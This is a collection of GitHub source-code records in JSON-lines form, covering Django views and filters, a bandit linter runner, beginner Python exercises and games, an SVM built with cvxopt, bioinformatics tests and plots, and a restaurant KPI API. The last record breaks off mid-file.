{"seq_id":"29527356612","text":"# Create your views here.\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nimport pdb\nimport urllib\nimport json\nfrom django.utils.safestring import SafeString\nimport csv\n\ndef home(request):\n\treturn render(request, 'D3/home.html', {})\n\ndef d3_visual(request):\n\turl = \"http://localhost:8983/solr/collection1/select?q=*&rows=500&wt=json&indent=true\"\n\tresponse = urllib.urlopen(url);\n\tdata = json.loads(response.read())\n\n\t#print json.dumps(data['response'], indent=4)\n\t\n\tresponse = data[\"response\"]\n\tdocs = response[\"docs\"]\n\t\n\tpie_dict = {}\n\td3_data = []\n\tfor each in docs:\n\t\tif \"title\" not in each:\n\t\t\tcontinue\n\t\td3_data += [{'id':each[\"id\"], 'title':each[\"title\"][0], 'content_type':each[\"content_type\"][0], 'content_length':len(each[\"content\"][0])}]\n\t\tif each[\"content_type\"][0] in pie_dict:\n\t\t\tpie_dict[each[\"content_type\"][0]] += 1\n\t\telse:\n\t\t\tpie_dict[each[\"content_type\"][0]] = 1\n\n\t# creating pie chart file\n\tf = open(\"./D3/static/D3/pie.csv\",\"w\")\n\tf.write(\"age,population\\n\")\n\tfor each in pie_dict:\n\t\tf.write(str(each) + \",\" + str(pie_dict[each]) + \"\\n\")\n\tf.close()\n\n\t# Creating bar chart file\n\tf = open(\"./D3/static/D3/bar.tsv\",\"w\")\n\tf.write(\"letter,frequency\\n\")\n\ti = 0\n\tfor each in docs:\n\t\tif i>100:\n\t\t\tbreak\n\t\ti += 1\n\t\tf.write( \"File\" + str(i) + \",\" + str(len(each[\"content\"][0])) + \"\\n\")\n\tf.close()\n\n\treturn HttpResponse(json.dumps({\"d3_data\":d3_data}), content_type=\"application/json\")\n\ndef banana_visual(request):\n\treturn render(request, 'D3/banana_visual.html', {})\n\ndef facetview_visual(request):\n\treturn render(request, 'D3/facetview_visual.html', {})\n","repo_name":"suhassub/DataVisualiztion-D3","sub_path":"IR3/D3/views_copy.py","file_name":"views_copy.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"3499589112","text":"from subprocess import check_call, CalledProcessError\nimport argparse\nimport os\nimport logging\nimport sys\n\nfrom ci_tools.environment_exclusions import (\n    is_check_enabled\n)\nfrom ci_tools.variables import in_ci\n\nlogging.getLogger().setLevel(logging.INFO)\n\nif __name__ 
== \"__main__\":\n parser = argparse.ArgumentParser(description=\"Run bandit against target folder.\")\n\n parser.add_argument(\n \"-t\",\n \"--target\",\n dest=\"target_package\",\n help=\"The target package directory on disk. The target module passed to bandit will be <target_package>/azure.\",\n required=True,\n )\n\n args = parser.parse_args()\n package_name = os.path.basename(os.path.abspath(args.target_package))\n\n if in_ci():\n if not is_check_enabled(args.target_package, \"bandit\"):\n logging.info(\n f\"Package {package_name} opts-out of bandit check.\"\n )\n exit(0)\n\n try:\n check_call(\n [\n sys.executable,\n \"-m\",\n \"bandit\",\n \"-r\",\n os.path.join(args.target_package, \"azure\"),\n \"-ll\",\n ]\n )\n except CalledProcessError as e:\n logging.error(\"{} exited with error {}\".format(package_name, e.returncode))\n exit(1)\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"eng/tox/run_bandit.py","file_name":"run_bandit.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"16911399184","text":"\"\"\"Write a Python program to create and display all combinations of letters,\nselecting each letter from a different key in a dictionary. Go to the editor\nSample data : {'1':['a','b'], '2':['c','d']}\nExpected Output:\nac\nad\nbc\nbd\nClick me to see the sample solution\"\"\"\nl = {'1':['a','b'], '2':['c','d']}\n\n\n\"\"\"Write a Python program to find the highest 3 values in a dictionary. \"\"\"\nfrom collections import Counter\nN = int(input())\nd = {'ravi':'10','rajnish':'9','sanjeev':'15','yash':'2','suraj':'32','neha':'7','harsh':'25'}\ndd = {key:int(value) for key,value in d.items()}\nprint(dict(Counter(dd).most_common(N)))\n\n\"\"\"Write a Python program to combine values in python list of dictionaries. Go to the editor\nSample data: [{'item': 'item1', 'amount': 400}, {'item': 'item2', 'amount': 300}, {'item': 'item1', 'amount': 750}]\nExpected Output: Counter({'item1': 1150, 'item2': 300})\"\"\"\n\n\"\"\"Write a Python program to create a dictionary from a string. Go to the editor\nNote: Track the count of the letters from the string.\nSample string : 'w3resource'\nExpected output: {'3': 1, 's': 1, 'r': 2, 'u': 1, 'w': 1, 'c': 1, 'e': 2, 'o': 1}\"\"\"\ns= 'w3resource'\nk = Counter(s)\nprint(k)\n\n\"\"\"Write a Python program to get the top three items in a shop. 
Go to the editor\nSample data: {'item1': 45.50, 'item2':35, 'item3': 41.30, 'item4':55, 'item5': 24}\nExpected Output:\nitem4 55\nitem1 45.5\nitem3 41.3\"\"\"\nd1 = {'item1': 45.50, 'item2':35, 'item3': 41.30, 'item4':55, 'item5': 24}\nk1 = dict(Counter(d1).most_common(N))\nprint(k1)","repo_name":"nekapoor7/Python-and-Django","sub_path":"Python/Dir/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"23322123921","text":"'''\r\nRock beats scissors Scissors beats paper Paper beats rock\r\nSample Input 0\r\n\r\nAmrit\r\nRavi\r\nRock\r\nScissor\r\nSample Output 0\r\n\r\nAmrit Win\r\nSample Input 1\r\n\r\nAbdul\r\nShikha\r\nPaper\r\nRock\r\n'''\r\na=input()\r\nb=input()\r\nc=input()\r\nd=input()\r\nif(c==\"Scissor\"):\r\n    if(d==\"Rock\"):\r\n        print(b,\"Win\")\r\n    else:\r\n        print(a,\"Win\")\r\nelif(c==\"Paper\"):\r\n    if(d==\"Scissor\"):\r\n        print(b,\"Win\")\r\n    else:\r\n        print(a,\"Win\")\r\nelse:\r\n    if(d==\"Scissor\"):\r\n        print(a,\"Win\")\r\n    else:\r\n        print(b,\"Win\")\r\n    \r\n","repo_name":"NitinSikarwar-32/Practice-1","sub_path":"Python Practice1/Rock_paper_scissors.py","file_name":"Rock_paper_scissors.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"38578571767","text":"import django_filters\nfrom django import forms\nfrom .models import *\nfrom Shop.models import *\n\n\nclass order_filter (django_filters.FilterSet):\n    CHOISE_PRODUCT = [item.name for item in Product.objects.all ( )]\n\n    start_date = django_filters.DateFilter (field_name='order__creation_date', lookup_expr='gte',\n                                            widget=forms.TextInput (attrs={\n                                                'placeholder': 'Start Date', 'class': 'input-group-text',\n                                                'type': 'date'}),\n                                            label='')\n    end_date = django_filters.DateFilter (field_name='order__creation_date', lookup_expr='lte',\n                                          widget=forms.TextInput (attrs={\n                                              'placeholder': 'End Date', 'class': 'input-group-text', 'type': 'date'}),\n                                          label='')\n    user = django_filters.CharFilter (field_name='user', lookup_expr='icontains', widget=forms.TextInput (attrs={\n        'class': 'input-group-text', 'placeholder': 'Seller'}),\n                                      label='')\n\n    class Meta:\n        model = OrderItem\n        fields = []\n        filter_overrides = {\n            models.DateField: {\n                'filter_class': django_filters.DateFilter,\n                'extra': lambda f: {\n                    'widget': forms.DateField,\n                }\n            }}\n\n\nclass product_filter (django_filters.FilterSet):\n    name = django_filters.CharFilter (field_name='name', lookup_expr='icontains', widget=forms.TextInput (attrs={\n        'placeholder': 'Product Name', 'class': 'input-group-text', 'type': 'Text'}), label='')\n    category = django_filters.ChoiceFilter (field_name='category',\n                                            choices=[(i.id, i.name) for i in SubCategory.objects.all ( )],\n                                            )\n\n\n    class Meta:  # re-indented into product_filter; at module level this Meta was silently ignored\n        model = Product\n        fields = []\n        filter_overrides = {\n            models.ImageField: {\n                'filter_class': django_filters.CharFilter,\n                'extra': lambda f: {\n                    'lookup_expr': 'icontains',\n                }}}\n","repo_name":"smnshzh/Warehouse","sub_path":"cart/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"10616180478","text":"import unittest\n\nfrom alfpy import wmetric\nfrom alfpy.utils import distmatrix\nfrom alfpy.utils.data import subsmat\n\nfrom . 
import utils\n\n\nclass VectorTest(unittest.TestCase):\n\n def test_count_seq_chars(self):\n seq = 'MKSTGWHFSG'\n l = wmetric.count_seq_chars(seq, utils.ALPHABET_PEP)\n expl = [0, 0, 0, 0, 1, 2, 1, 0, 1, 0, 1, 0, 0, 0, 2, 1, 0, 1, 0, 0]\n self.assertEqual(l, expl)\n\n def test_count_seq_chars_pep_ambiguous(self):\n seq = 'MKSTGWXXXXXXXOOOOOOOHFSG'\n l = wmetric.count_seq_chars(seq, utils.ALPHABET_PEP)\n expl = [0, 0, 0, 0, 1, 2, 1, 0, 1, 0, 1, 0, 0, 0, 2, 1, 0, 1, 0, 0]\n self.assertEqual(l, expl)\n\n def test_freq_seq_chars(self):\n seq = 'MKSTGWXXXXXXXOOOOOOOHFSG'\n l = wmetric.count_seq_chars(seq, utils.ALPHABET_PEP)\n freq = wmetric.freq_seq_chars(l)\n expfreq = [0.0, 0.0, 0.0, 0.0, 0.1, 0.2, 0.1, 0.0, 0.1, 0.0,\n 0.1, 0.0, 0.0, 0.0, 0.2, 0.1, 0.0, 0.1, 0.0, 0.0]\n self.assertEqual(freq, expfreq)\n\n\nclass DistanceTest(unittest.TestCase, utils.ModulesCommonTest):\n\n def __init__(self, *args, **kwargs):\n super(DistanceTest, self).__init__(*args, **kwargs)\n utils.ModulesCommonTest.set_test_data()\n\n def test_wmetric_blosum62(self):\n # The result of this method is identical to that from decaf+py.\n matrix = subsmat.get('blosum62')\n dist = wmetric.Distance(self.pep_records, matrix)\n matrix = distmatrix.create(self.pep_records.id_list, dist)\n data = [' 4',\n 'seq1 0.0000000 0.0392559 0.0783026 0.1261381',\n 'seq2 0.0392559 0.0000000 0.0377364 0.1166475',\n 'seq3 0.0783026 0.0377364 0.0000000 0.1677386',\n 'seq4 0.1261381 0.1166475 0.1677386 0.0000000']\n self.assertEqual(matrix.format(), \"\\n\".join(data))\n\n def test_wmetric_pam250(self):\n matrix = subsmat.get('pam250')\n dist = wmetric.Distance(self.pep_records, matrix)\n matrix = distmatrix.create(self.pep_records.id_list, dist)\n data = [' 4',\n 'seq1 0.0000000 0.0289700 0.0467580 0.0353781',\n 'seq2 0.0289700 0.0000000 0.0227122 0.0372699',\n 'seq3 0.0467580 0.0227122 0.0000000 0.0578383',\n 'seq4 0.0353781 0.0372699 0.0578383 0.0000000']\n self.assertEqual(matrix.format(), \"\\n\".join(data))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"aziele/alfpy","sub_path":"tests/test_wmetric.py","file_name":"test_wmetric.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"74093515360","text":"import random\nimport re\n\nclass allrange:\n def __init__(self, string, var_type=None ):\n self.length = 0\n self.var_type = var_type\n \n string = str(string)\n value = string.split(\",\")\n if value.count('')==2:\n value.append(',')\n value = [i for i in value if i!='']\n\n self.data = []\n for v in value:\n if \"-\"==v:\n self.data.append(v)\n self.length+=1\n elif \"-\" in v and v.rfind('-')!=0:\n if v.count(\"-\")==1:\n lower_bound,upper_bound = v.split(\"-\")\n else:\n (ind,_) = re.search(r\"\\d(-)\",v).span(1)\n lower_bound = v[:ind]\n upper_bound = v[ind+1:]\n\n if var_type == str:\n if lower_bound.isdigit() or (len(lower_bound)>1 and lower_bound[0]=='-' and lower_bound[1:].isdigit()):\n self.data.append([range(int(lower_bound),int(upper_bound)+1),str])\n self.length += int(upper_bound) - int(lower_bound) + 1\n else:\n self.data.append([range(ord(lower_bound),ord(upper_bound)+1),chr])\n self.length += ord(upper_bound) - ord(lower_bound) + 1\n elif var_type == int:\n self.data.append([range(int(lower_bound),int(upper_bound)+1),int])\n self.length += int(upper_bound) - int(lower_bound) + 1\n\n else:\n self.data.append(var_type(v))\n self.length+=1\n # print(self.data)\n\n def __len__(self):\n return self.length\n 
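# (added example, hedged) illustrating the range-string format this class parses:\n    #   allrange('a-f,x,1-3', var_type=str)\n    # yields the character range a..f, the literal 'x', and 1..3 rendered as strings,\n    # so len() is 10 and indexing walks those pieces in order.\n    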
\n def __getitem__(self,key):\n for d in self.data:\n if type(d) == list:\n if key < d[0][-1] - d[0][0] + 1:\n return d[1](d[0][key])\n key -= d[0][-1] - d[0][0] + 1\n else:\n if key == 0:\n return d\n key-=1\n raise Exception(\"Key out of range\")\n \n def get_lower_random(self,k):\n new_data = []\n new_data_length = 0\n for d in self.data:\n if type(d) == list:\n if d[0][0] > k:\n break\n elif d[0][-1] <=k:\n new_data.append(d)\n new_data_length += d[0][-1] - d[0][0] + 1\n else:\n new_data.append([range(d[0][0],k+1),d[1]])\n new_data_length += k - d[0][0] + 1\n else:\n if d<=k:\n new_data.append(d)\n new_data_length+=1\n else:\n break\n \n if len(new_data)==0:\n raise Exception(\"No suitable length found for unique values\")\n # print(new_data)\n ind = random.randint(0,new_data_length-1)\n for d in new_data:\n if type(d) == list:\n if ind < d[0][-1] - d[0][0] + 1:\n return d[1](d[0][ind])\n ind -= d[0][-1] - d[0][0] + 1\n else:\n if ind == 0:\n return d\n ind-=1\n\n\n def random(self,k=None):\n values=[]\n if k==None:\n tk = 1\n else:\n tk = k\n for _ in range(tk):\n values.append(self[random.randint(0,self.length-1)])\n if k==None:\n return values[0]\n else :\n return values\n","repo_name":"biswajitpatra/Testcase-Generator","sub_path":"server/range_class.py","file_name":"range_class.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38616239838","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 23 15:14:29 2017\n\n@author: dom,jantschi,marcel,stef\n\"\"\"\n\nimport numpy as np\n\nfilename_example = 'input/example.in'\nfilename_small = 'input/small.in'\nfilename_medium = 'input/medium.in'\nfilename_big = 'input/big.in'\n\nwith open(filename_small, mode='r') as file: # b is important -> binary\n fileContent = file.read()\nfile.close()\n\nnr_cols = int(fileContent[0])\nnr_rows = int(fileContent[2])\n\nfileContent = fileContent.replace(\"\\n\", \"\")\npizzaContent = fileContent[7:]\npizzaContent = np.array(list(pizzaContent))\npizza_matrix = np.reshape(pizzaContent, (nr_cols, nr_rows))\n\n\nprint ('write file')\nout_path = 'input/output.in'\nfo = open(out_path, \"w\")\n\n#for ind in range(0,np.size(pizza_matrix,0)):\n# fo.write( str(pizza_matrix[ind,:])+ \"\\n\");\n # Close file\nfo.write(str(3) + \"\\n\" + str(0) + \" \" + str(0) + \" \"+str(2) + \" \" +\n str(1) + \"\\n\" + str(0) + \" \" + str(2)+ \" \" + str(2)+ \" \" +\n str(2) + \"\\n\" + str(0) + \" \" +str(3) + \" \" +str(2) + \" \"+ str(4))\nfo.close()\n\nprint(\"done\")\n","repo_name":"dosc919/google_hashcode","sub_path":"practice/Pizza_ex.py","file_name":"Pizza_ex.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70254815201","text":"import numpy as np\nimport pandas as pd\nfrom cvxopt import matrix as cvx_matrix\nfrom cvxopt import solvers as cvx_solvers\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\nDataset = pd.read_csv('./2017EE10436.csv',header=None);\nnum_features = 10\nF = Dataset.iloc[:,:num_features].values\nT = Dataset.iloc[:,-1].values\n\nlabel1 = 0\nlabel2 = 1\nF1 = []\nT1 = []\nfor k in range(0,len(T)):\n\tif(T[k]==label1):\n\t\tF1.append(F[k])\n\t\tT1.append(-1)\n\telif(T[k]==label2):\n\t\tF1.append(F[k])\n\t\tT1.append(1)\nF1 = np.asarray(F1)\nT1 = np.asarray(T1)\n\ndef linear(x1,x2):\n\treturn np.dot(x1,x2)\n\ndef polynomial(x1,x2,p):\n\treturn 
np.power((1+np.dot(x1,x2)),p)\n\ndef gaussian(x1,x2,gamma):\n\treturn np.exp(-1*gamma*(np.linalg.norm(x1-x2)**2))\n\nclass SVM(object):\n\tdef __init__(self,kernel='linear',C=None,p=4,gamma=1):\n\t\tself.kernel = kernel\n\t\tself.C = C\n\t\tself.p = p\n\t\tself.gamma = gamma\n\t\tif self.C is not None:\n\t\t\tself.C = float(self.C)\n\t\n\tdef fit(self,X,Y):\n\t\tn_samples = X.shape[0]\n#\t\tn_features = X.shape[1]\n\t\t\n\t\tK = np.zeros((n_samples,n_samples))\n\t\tif self.kernel == 'linear':\n\t\t\tfor i in range(n_samples):\n\t\t\t\tfor j in range(n_samples):\n\t\t\t\t\tK[i,j] = linear(X[i],X[j])\n\t\t\n\t\telif self.kernel == 'poly':\n\t\t\tfor i in range(n_samples):\n\t\t\t\tfor j in range(n_samples):\n\t\t\t\t\tK[i,j] = polynomial(X[i],X[j],self.p)\n\t\t\n\t\telif self.kernel == 'rbf':\n\t\t\tfor i in range(n_samples):\n\t\t\t\tfor j in range(n_samples):\n\t\t\t\t\tK[i,j] = gaussian(X[i],X[j],self.gamma)\n\t\t\n\t\telse:\n\t\t\traise Exception('Invalid kernel')\n\t\t\n\t\t#Declaring parameters for CVX solvers\n\t\tP = cvx_matrix(np.outer(Y,Y)* K)\n\t\tq = cvx_matrix(-np.ones((n_samples,1)))\n\t\tY = Y.astype('double')\n\t\tA = cvx_matrix(Y.reshape((1,-1)))\n\t\tb = cvx_matrix(0.0)\n\t\t\n\t\tif self.C is None:\n\t\t\tG = cvx_matrix(-np.identity(n_samples))\n\t\t\th = cvx_matrix(np.zeros((n_samples,1)))\t\n\t\telse:\n\t\t\tt1 = -np.identity(n_samples)\n\t\t\tt2 = np.identity(n_samples)\n\t\t\tG = cvx_matrix(np.vstack((t1,t2)))\n\t\t\tt1 = np.zeros((n_samples,1))\n\t\t\tt2 = np.ones((n_samples,1))*self.C\n\t\t\th = cvx_matrix(np.vstack((t1,t2)))\n\t\t\n\t\tanswer = cvx_solvers.qp(P,q,G,h,A,b)
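\n\t\t# (editor's note, added) cvxopt's qp solves min (1/2)x^T P x + q^T x  s.t.  Gx <= h, Ax = b;\n\t\t# here x is the vector of dual coefficients alpha of the soft-margin SVM dual problem.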
\n\t\tlag_mul = np.ravel(answer['x'])\n\t\tsupport_vectors = lag_mul>1e-5\n\t\tindexes = np.arange(len(lag_mul))\n\t\tlag_indexes = indexes[support_vectors]\n\t\tself.lag_mul = lag_mul[support_vectors]\n\t\tself.sv_x = X[support_vectors]\n\t\tself.support_vectors_=self.sv_x.astype(float)\n#\t\tfor i in range(self.sv_x.shape[0]):\n#\t\t\tself.support_vectors_.append(float(self.sv_x[i]))\n\t\tprint(self.support_vectors_)\n\t\tself.sv_y = Y[support_vectors]\n#\t\tprint(self.sv_x,self.sv_y)\n\t\tprint('No. of support vectors = '+str(len(self.lag_mul)))\n\t\t\n\t\t#intercept\n\t\tself.b = 0\n\t\tfor i in range(len(self.lag_mul)):\n#\t\t\tprint(K[lag_indexes[i],lag_indexes].shape)\n\t\t\tself.b += self.sv_y[i] - np.sum(self.lag_mul*self.sv_y*K[lag_indexes[i],lag_indexes])\n#\t\t\tprint(self.b)\n\t\tself.b = self.b/len(self.lag_mul)\n\t\t\n\tdef y_prediction(self,X):\n\t\ty_pred = np.zeros(X.shape[0])\n\t\tprint(X.shape[0])\n\t\tif self.kernel == 'linear':\n\t\t\tfor i in range(X.shape[0]):\n\t\t\t\tfor j in range(len(self.lag_mul)):\n\t\t\t\t\ty_pred[i] += self.lag_mul[j]*self.sv_y[j]*linear(X[i],self.sv_x[j])\n\t\t\n\t\telif self.kernel == 'poly':\n\t\t\tfor i in range(X.shape[0]):\n\t\t\t\tfor j in range(len(self.lag_mul)):\n\t\t\t\t\ty_pred[i] += self.lag_mul[j]*self.sv_y[j]*polynomial(X[i],self.sv_x[j],self.p)\n\t\t\n\t\telif self.kernel == 'rbf':\n\t\t\tfor i in range(X.shape[0]):\n\t\t\t\tfor j in range(len(self.lag_mul)):\n\t\t\t\t\ty_pred[i] += self.lag_mul[j]*self.sv_y[j]*gaussian(X[i],self.sv_x[j],self.gamma)\n\t\t\n\t\treturn y_pred+self.b\n\t\n\tdef predict(self,X):\n\t\ty_p = self.y_prediction(X)\n\t\ty_ans = np.zeros(X.shape[0])\n\t\tfor i in range(len(y_p)):\n\t\t\tif y_p[i] >= 0:\n\t\t\t\ty_ans[i] = 1\n\t\t\telif y_p[i] < 0:\n\t\t\t\ty_ans[i] = -1\n\t\treturn y_ans\n\t\t\n\t\t\n\t\t\nif __name__ == \"__main__\":\n\tdef conventionalMethod(X,Y):\n\t\tX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.30,random_state=100)\n\t\tclassifier = SVM(kernel='linear',C=0.1)\n\t\tclassifier.fit(X_train,y_train)\n\t\ty_pred = classifier.predict(X_test)\n\t\taccuracy = metrics.accuracy_score(y_test,y_pred)\n\t\tprint('Accuracy is ='+str(accuracy))\n\t\n\tconventionalMethod(F1,T1)\n\t\t","repo_name":"AmanTiwari1503/SVM-Design","sub_path":"BinaryCVX.py","file_name":"BinaryCVX.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"42460909019","text":"import os\r\nclear = lambda: os.system(\"cls\")\r\n\r\ndef tictactoe():\r\n    clear()\r\n    \r\n    play_again = True\r\n    print(\"Game is now starting:\")\r\n    while play_again:\r\n        board = [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\r\n        x = 1 # for player counting 1/2\r\n        print('PLAYER ', x, ':Enter your Marker')\r\n        marker = input()\r\n        player_1, player_2 = set_marker(marker)\r\n        while True:\r\n            if x > 2:\r\n                x = 1\r\n            print('PLAYER ', x, ':Enter your position')\r\n            pos = int(input())\r\n            # Checking whether the position is not previously filled\r\n            if not check_pos(pos, board):\r\n                continue\r\n\r\n            if x == 1:\r\n                set_board(board, player_1, pos)\r\n            else:\r\n                set_board(board, player_2, pos)\r\n\r\n            dispboard(board)\r\n            if x == 1:\r\n                if check_win(board, player_1):\r\n                    print('Player', x, 'Won the match')\r\n                    break\r\n            else:\r\n                if check_win(board, player_2):\r\n                    print('Player', x, 'Won the match')\r\n                    break\r\n\r\n            if not check_space(board): # check if there is no space in board\r\n                print('Draw!!!')\r\n                break\r\n\r\n            x = x + 1\r\n\r\n        if not replay():\r\n            play_again = False\r\n\r\n\r\ndef set_board(board, marker, pos):\r\n    board[pos] = marker\r\n    return board\r\n\r\n\r\ndef check_win(board, marker):\r\n    wins = ((1, 2, 3), (4, 5, 6), (7, 8, 9), (1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 5, 9), (3, 5, 7))\r\n    return any(board[a] == marker and board[b] == marker and board[c] == marker for a, b, c in wins)
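\r\n# (editor's note, added) the triples in check_win are the three rows, the three columns\r\n# and the two diagonals of the 1-indexed 3x3 board.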
\r\n\r\n\r\ndef dispboard(board):\r\n    clear()\r\n    print(f' {board[1]} | {board[2]} | {board[3]}')\r\n    print('-------------')\r\n    print(f' {board[4]} | {board[5]} | {board[6]}')\r\n    print('-------------')\r\n    print(f' {board[7]} | {board[8]} | {board[9]}')\r\n\r\n\r\ndef replay():\r\n    print('Do you want to play again Y/N ')\r\n    ans = input('y/n')\r\n    return ans == 'Y' or ans == 'y'\r\n\r\n\r\ndef set_marker(marker):\r\n    if marker == 'X':\r\n        return ('X', 'O')\r\n    else:\r\n        return ('O', 'X')\r\n\r\n\r\ndef check_pos(pos, board):\r\n    if board[pos] != ' ':\r\n        print('Position is already filled')\r\n        return False\r\n    else:\r\n        return True\r\n\r\n\r\ndef check_space(board):\r\n    for i in range(1, 10):\r\n        if board[i] == ' ':\r\n            return True\r\n    return False\r\n\r\ntictactoe()\r\n","repo_name":"deepjoy9/TicTacToe-Python","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"2035957418","text":"import argparse\nfrom Bio import SeqIO\nfrom Bio.SeqUtils import gc_fraction\nimport matplotlib.pyplot as plt\n\ndef plot_gc_content(input_file):\n    gc_values = sorted(\n        100 * gc_fraction(rec.seq) for rec in SeqIO.parse(input_file, \"fasta\")\n    )\n\n    plt.plot(gc_values)\n    plt.title(\n        \"%i sequences\\nGC%% %0.1f to %0.1f\"\n        % (len(gc_values), min(gc_values), max(gc_values))\n    )\n    plt.xlabel(\"Genes\")\n    plt.ylabel(\"GC%\")\n    plt.show()\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Plot GC content of sequences.\")\n    parser.add_argument(\"-f\", \"--file\", required=True, help=\"Input FASTA file\")\n    args = parser.parse_args()\n\n    plot_gc_content(args.file)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Health-Universe/Biopython-Sequence-Parsing-Plots","sub_path":"PlotofSequenceGC.py","file_name":"PlotofSequenceGC.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"17643652215","text":"from datetime import datetime\nfrom django.db.models import (\n    Count, \n    DateTimeField, \n    CharField,\n    Q,\n    Sum,\n)\nfrom django.db.models.functions import (\n    Cast,\n    Substr,\n    TruncHour,\n    TruncDay,\n    TruncWeek, \n    TruncMonth, \n    TruncYear,\n)\nfrom rest_framework import generics, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom apps.sales.models import Pos\nfrom .models import Restaurant\nfrom .serializer import RestaurantSerializer, RestaurantPaymentKPISerializer, PosSerializer\n\n\n# API for creating a Restaurant and listing all restaurants\nclass RestaurantListAPIView(generics.ListCreateAPIView):\n    '''\n    Assignee : 장우경\n    Reviewer : 홍은비\n    '''\n    queryset = Restaurant.objects.all()\n    serializer_class = RestaurantSerializer\n\n\n# API for retrieving, updating and deleting a single Restaurant\nclass RestaurantDetailAPIView(generics.RetrieveUpdateDestroyAPIView):\n    '''\n    Assignee : 장우경\n    Reviewer : -\n    '''\n    queryset = Restaurant.objects.all()\n    serializer_class = RestaurantSerializer\n\n\n# KPI per restaurant, grouped by party size\nclass KPIPerRestaurantAPIView(APIView):\n    '''\n    Assignee : 장우경\n    Reviewer : 홍은비, 진병수\n    '''\n    def get(self, request):\n        try:\n            start_time = datetime.strptime(request.GET.get('start_time', None), '%Y-%m-%d').date()\n
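            # (editor's note, added) both bounds must arrive as yyyy-mm-dd; a missing parameter makes strptime raise TypeError, which is answered with 404 below.\n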
            end_time = datetime.strptime(request.GET.get('end_time', None), '%Y-%m-%d').date()\n        except TypeError:\n            return Response({'message': 'Please provide a date'}, status=status.HTTP_404_NOT_FOUND)\n        min_party = request.GET.get('min_party', None)\n        max_party = request.GET.get('max_party', None)\n        group_id = request.GET.get('group_id', None)\n        # min_price = request.GET.get('min_price', None)\n        # max_price = request.GET.get('max_price', None)\n        \n        q = Q()\n        \n        # filter by time range\n        if start_time and end_time:\n            q &= Q(created_datetime__gte=start_time, created_datetime__lte=end_time)\n        \n        # filter by party size\n        if min_party and max_party:\n            q &= Q(number_of_party__gte=min_party, number_of_party__lte=max_party)\n\n        # filter by restaurant group\n        if group_id:\n            q &= Q(restaurant__group=group_id)\n        \n        pos_queryset = Pos.objects.filter(q).values('number_of_party')\\\n            .annotate(num_count=Count('number_of_party'))\\\n            .values('restaurant_id', 'number_of_party', 'num_count', 'restaurant__group')\n        \n        serializer = PosSerializer(pos_queryset, many=True)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass RestaurantPaymentKPIView(APIView):\n    '''\n    Assignee : 홍은비\n    Reviewer : 장우경, 진병수, 김수빈\n    '''\n    def get(self, request):\n        pos = Pos.objects.all()\n        \n        # Filter 1: Start Time / End Time\n        \n        start_time = request.GET.get('start_time', None)\n        end_time = request.GET.get('end_time', None)\n\n        if start_time and end_time:\n            try:\n                start_time = datetime.strptime(start_time, '%Y-%m-%d').date()\n                end_time = datetime.strptime(end_time, '%Y-%m-%d').date()\n                # end_time itself is not included by __range, so an icontains condition is added to include it\n                pos = pos.filter(Q(created_datetime__range=(start_time,end_time)) | Q(created_datetime__icontains=end_time))\n            except ValueError:\n                return Response('[Date format error] Please request dates in yyyy-mm-dd format.', status=404)\n\n\n        # Filter 2: Price range\n\n        min_price = request.GET.get('min_price', None)\n        max_price = request.GET.get('max_price', None)\n\n        if min_price and max_price:\n            pos = pos.annotate(total_price=Sum('menu__price')).values('id', 'total_price')\\\n                .filter(total_price__gte=min_price, total_price__lte=max_price)\n\n\n        # Filter 3: Number of party\n\n        min_party = request.GET.get('min_party', None)\n        max_party = request.GET.get('max_party', None)\n        if min_party and max_party:\n            pos = pos.filter(number_of_party__gte=min_party, number_of_party__lte=max_party)\n\n\n        # Filter 4: Restaurant group\n        \n        group = request.GET.get('group', None)\n        if group:\n            pos = pos.filter(restaurant__group__name=group)\n        \n\n        # HOUR, DAY, WEEK, MONTH, YEAR\n\n        window_size = request.GET.get('window_size', None)\n        window_type = ['HOUR', 'DAY', 'WEEK', 'MONTH', 'YEAR']\n\n        if window_size not in window_type:\n            return Response('[Window size type error] window_size must be one of HOUR, DAY, WEEK, MONTH, YEAR.', status=404)\n\n        if window_size == 'HOUR':\n            pos = pos.annotate(hour=\n                Substr(\n                    Cast(TruncHour('created_datetime', output_field=DateTimeField()),\n                    output_field=CharField()), 